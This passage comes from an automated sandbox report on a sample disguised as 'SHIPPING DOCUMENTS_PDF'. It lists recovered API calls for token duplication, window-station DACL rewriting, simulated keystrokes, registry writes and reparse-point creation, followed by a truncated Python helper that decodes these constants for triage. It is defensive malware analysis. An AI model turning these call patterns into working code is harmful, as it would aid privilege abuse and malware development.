                                                                                    • GetKeyState.USER32(00000009), ref: 00BDCCC3
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCCD9
                                                                                    • GetKeyState.USER32(00000010), ref: 00BDCCE3
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCD0C
                                                                                    • SendMessageW.USER32 ref: 00BDCD33
                                                                                    • SendMessageW.USER32(?,00001030,?,00BDB348), ref: 00BDCE37
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BDCE4D
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BDCE60
                                                                                    • SetCapture.USER32(?), ref: 00BDCE69
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDCECE
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BDCEDB
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BDCEF5
                                                                                    • ReleaseCapture.USER32 ref: 00BDCF00
                                                                                    • GetCursorPos.USER32(?), ref: 00BDCF3A
                                                                                    • ScreenToClient.USER32(?,?), ref: 00BDCF47
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDCFA3
                                                                                    • SendMessageW.USER32 ref: 00BDCFD1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD00E
                                                                                    • SendMessageW.USER32 ref: 00BDD03D
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BDD05E
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BDD06D
                                                                                    • GetCursorPos.USER32(?), ref: 00BDD08D
                                                                                    • ScreenToClient.USER32(?,?), ref: 00BDD09A
                                                                                    • GetParent.USER32(?), ref: 00BDD0BA
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDD123
                                                                                    • SendMessageW.USER32 ref: 00BDD154
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDD1B2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BDD1E2
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD20C
                                                                                    • SendMessageW.USER32 ref: 00BDD22F
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDD281
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BDD2B5
                                                                                      • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDD351
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 3977979337-4164748364
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BD84D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 3850602802-328681919
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$_memset
                                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                    • API String ID: 1357608183-1798697756
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00B548DF
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B8D665
                                                                                    • IsIconic.USER32(?), ref: 00B8D66E
                                                                                    • ShowWindow.USER32(?,00000009), ref: 00B8D67B
                                                                                    • SetForegroundWindow.USER32(?), ref: 00B8D685
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8D69B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B8D6A2
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8D6AE
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6BF
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6C7
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B8D6CF
                                                                                    • SetForegroundWindow.USER32(?), ref: 00B8D6D2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6E7
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D6F2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6FC
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D701
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D70A
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D70F
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D719
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D71E
                                                                                    • SetForegroundWindow.USER32(?), ref: 00B8D721
                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00B8D748
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    APIs
                                                                                      • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                                                      • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                                                      • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                                                                    • _memset.LIBCMT ref: 00BA8353
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BA83A5
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BA83B6
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA83CD
                                                                                    • GetProcessWindowStation.USER32 ref: 00BA83E6
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00BA83F0
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA840A
                                                                                      • Part of subcall function 00BA81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                                                                      • Part of subcall function 00BA81CB: CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2063423040-1027155976
                                                                                    • Opcode ID: f0cafbf02f5bb11b3b125d39485f2fe7ad6f1891a8d04852679564b91f82c0bb
                                                                                    • Instruction ID: e2e797c9590b33d9d85ce170dbedc62a5606bd4c5885aac5af0b669dfb8f1c12
                                                                                    • Opcode Fuzzy Hash: f0cafbf02f5bb11b3b125d39485f2fe7ad6f1891a8d04852679564b91f82c0bb
                                                                                    • Instruction Fuzzy Hash: 9B814B71D09209AFDF119FA4CC45AEEBBF9EF05304F1481AAFD15A6661EB318E14DB20
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BBC78D
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBC7E1
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC806
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC81D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC844
                                                                                    • __swprintf.LIBCMT ref: 00BBC890
                                                                                    • __swprintf.LIBCMT ref: 00BBC8D3
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • __swprintf.LIBCMT ref: 00BBC927
                                                                                      • Part of subcall function 00B73698: __woutput_l.LIBCMT ref: 00B736F1
                                                                                    • __swprintf.LIBCMT ref: 00BBC975
                                                                                      • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B73713
                                                                                      • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B7372B
                                                                                    • __swprintf.LIBCMT ref: 00BBC9C4
                                                                                    • __swprintf.LIBCMT ref: 00BBCA13
                                                                                    • __swprintf.LIBCMT ref: 00BBCA62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 3953360268-2428617273
                                                                                    • Opcode ID: adf568ddc1840f4af5eb670bff1104d36ae765c2e56759234714a47a40f47289
                                                                                    • Instruction ID: 176cd7363fccc651d794aeca97498ee8b67e3c9d0d8229cb1da0fb610288eb05
                                                                                    • Opcode Fuzzy Hash: adf568ddc1840f4af5eb670bff1104d36ae765c2e56759234714a47a40f47289
                                                                                    • Instruction Fuzzy Hash: F1A11FB1508305ABC710EF94CC95EBFB7ECEF98701F4049A9F99586191EB35DA08CB62
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BBEFB6
                                                                                    • _wcscmp.LIBCMT ref: 00BBEFCB
                                                                                    • _wcscmp.LIBCMT ref: 00BBEFE2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00BBEFF4
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00BBF00E
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF026
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF031
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF04D
                                                                                    • _wcscmp.LIBCMT ref: 00BBF074
                                                                                    • _wcscmp.LIBCMT ref: 00BBF08B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF09D
                                                                                    • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF0BB
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF0C5
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF0D2
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF0E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                                                                    • Instruction ID: e59da4f38bbdfa7f468280c9c39da89e82ab13376215a8fa98f9fdc17788d1cb
                                                                                    • Opcode Fuzzy Hash: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                                                                    • Instruction Fuzzy Hash: 9631F03250520A6BDB14AFA4DC59AFEB7ECDF48360F0441B2F845E30A1EFB0DA44CA64
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD0953
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BDF910,00000000,?,00000000,?,?), ref: 00BD09C1
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BD0A09
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BD0A92
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BD0DB2
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD0DBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: f29a47fdd8f50f2a647436d6252cfa7a0af105520a5b9e4df9356ab18ec96395
                                                                                    • Instruction ID: f07defda9d4ccd3e9f470572bb884fbde672b96a571506c22aa275710b47653d
                                                                                    • Opcode Fuzzy Hash: f29a47fdd8f50f2a647436d6252cfa7a0af105520a5b9e4df9356ab18ec96395
                                                                                    • Instruction Fuzzy Hash: 500238756146019FCB14EF24C891E2AB7E5FF89314F0485ADF89A9B3A2DB30ED45CB81
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BBF113
                                                                                    • _wcscmp.LIBCMT ref: 00BBF128
                                                                                    • _wcscmp.LIBCMT ref: 00BBF13F
                                                                                      • Part of subcall function 00BB4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BB43A0
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF16E
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF179
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF195
                                                                                    • _wcscmp.LIBCMT ref: 00BBF1BC
                                                                                    • _wcscmp.LIBCMT ref: 00BBF1D3
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF1E5
                                                                                    • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF203
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF20D
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF21A
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF22C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                                                                    • Instruction ID: 13a97df6b35d0823ca46f21199c4ada0b3f37d3a1da10626d1225ba958db950d
                                                                                    • Opcode Fuzzy Hash: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                                                                    • Instruction Fuzzy Hash: 3131E23650121B6BCB10AFA4EC59AFEB7ECDF45320F1041F2F854A30A0EB70DA45CA54
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BBA20F
                                                                                    • __swprintf.LIBCMT ref: 00BBA231
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BBA26E
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BBA293
                                                                                    • _memset.LIBCMT ref: 00BBA2B2
                                                                                    • _wcsncpy.LIBCMT ref: 00BBA2EE
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BBA323
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BBA32E
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00BBA337
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BBA341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                                                                    • Instruction ID: 5881a857165c9c2d676ab1b8df6849869d6cc461bd6ac88012b660934d0f8c50
                                                                                    • Opcode Fuzzy Hash: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                                                                    • Instruction Fuzzy Hash: 8D318DB190410AABDB219FA4DC49FFB77FCEF89740F1041B6F509D2160EBB096448B29
                                                                                    APIs
                                                                                      • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                                                                      • Part of subcall function 00BA8202: GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                                                                      • Part of subcall function 00BA8202: GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                                                                      • Part of subcall function 00BA8202: HeapAlloc.KERNEL32(00000000,?,00BA7CE2,?,?,?), ref: 00BA823E
                                                                                      • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                                                                      • Part of subcall function 00BA829F: GetProcessHeap.KERNEL32(00000008,00BA7CF8,00000000,00000000,?,00BA7CF8,?), ref: 00BA82AB
                                                                                      • Part of subcall function 00BA829F: HeapAlloc.KERNEL32(00000000,?,00BA7CF8,?), ref: 00BA82B2
                                                                                      • Part of subcall function 00BA829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BA7CF8,?), ref: 00BA82C3
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA7D13
                                                                                    • _memset.LIBCMT ref: 00BA7D28
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA7D47
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00BA7D58
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00BA7D95
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA7DB1
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00BA7DCE
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BA7DDD
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00BA7DE4
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA7E05
                                                                                    • CopySid.ADVAPI32(00000000), ref: 00BA7E0C
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA7E3D
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA7E63
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA7E77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                                                                    • Instruction ID: da5246be21fb1aba21ec7440df51b5ee381ee08e5a8c80437e71a80610424ce0
                                                                                    • Opcode Fuzzy Hash: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                                                                    • Instruction Fuzzy Hash: 46611E7190820AAFDF109FA5DC95ABEBBB9FF05300F0481AAE915A7251DB319A05CB60
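The listings above for the window-station function (OpenWindowStationW on winsta0 with access 00060000, OpenDesktopW on default with 00060081), the CreateDirectoryW/CreateFileW/DeviceIoControl function (file flags 02200000, IOCTL 000900A4, string "\??\%s") and the DACL-editing function (GetAce/AddAce, SetUserObjectSecurity with 00000004) show their arguments only as raw hex. The Python below is added here as a triage helper; it is not part of the Joe Sandbox report nor code from the sample. It parses lines in the report's "APIs" format, decodes the access masks, file flags and IOCTL code against the Win32 SDK constants (the tables are mine, taken from the SDK headers), and flags the two sequences worth a second look: a reparse point set through a handle opened with FILE_FLAG_OPEN_REPARSE_POINT, and WRITE_DAC access to winsta0/default followed by a DACL rewrite. The sample listings inside the block are copied from the report; the rule names and finding texts are assumptions of this example.

```python
"""Parse a Joe Sandbox 'APIs' listing and decode its argument constants.

Added triage helper, not part of the Joe Sandbox report or of the analysed
sample. Assumes lines read 'Name.MODULE(arg,...), ref: ADDR' as rendered in the
report, that recovered arguments are 32-bit hex or string literals, and that
'?' marks a value the sandbox could not recover.
"""
import re
from dataclasses import dataclass
from typing import Optional

CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

# Win32 SDK constants (from the SDK headers, not from the report).
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT", 0x00000080: "FILE_ATTRIBUTE_NORMAL"}
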